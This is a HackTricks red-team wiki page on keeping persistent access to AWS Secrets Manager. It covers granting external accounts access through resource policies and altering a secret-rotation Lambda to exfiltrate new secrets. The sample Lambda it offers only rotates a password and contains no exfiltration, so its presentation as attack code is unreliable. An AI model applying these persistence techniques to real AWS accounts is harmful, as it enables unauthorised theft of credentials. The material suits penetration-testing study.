Skip to content

Latest commit

 

History

History
79 lines (53 loc) · 4.02 KB

aws-secrets-manager-persistence.md

File metadata and controls

79 lines (53 loc) · 4.02 KB
Raw

AWS - Secrets Manager Persistence

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Secrets Manager

For more info check:

{% content-ref url="../aws-services/aws-secrets-manager-enum.md" %} aws-secrets-manager-enum.md {% endcontent-ref %}

Via Resource Policies

It's possible to grant access to secrets to external accounts via resource policies. Check the Secrets Manager Privesc page for more information. Note that to access a secret, the external account will also need access to the KMS key encrypting the secret.

Via Secrets Rotate Lambda

To rotate secrets automatically a configured Lambda is called. If an attacker could change the code he could directly exfiltrate the new secret to himself.

This is how lambda code for such action could look like:

import boto3

def rotate_secrets(event, context):
    # Create a Secrets Manager client
    client = boto3.client('secretsmanager')

    # Retrieve the current secret value
    secret_value = client.get_secret_value(SecretId='example_secret_id')['SecretString']

    # Rotate the secret by updating its value
    new_secret_value = rotate_secret(secret_value)
    client.update_secret(SecretId='example_secret_id', SecretString=new_secret_value)

def rotate_secret(secret_value):
    # Perform the rotation logic here, e.g., generate a new password

    # Example: Generate a new password
    new_secret_value = generate_password()

    return new_secret_value

def generate_password():
    # Example: Generate a random password using the secrets module
    import secrets
    import string
    password = ''.join(secrets.choice(string.ascii_letters + string.digits) for i in range(16))
    return password

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}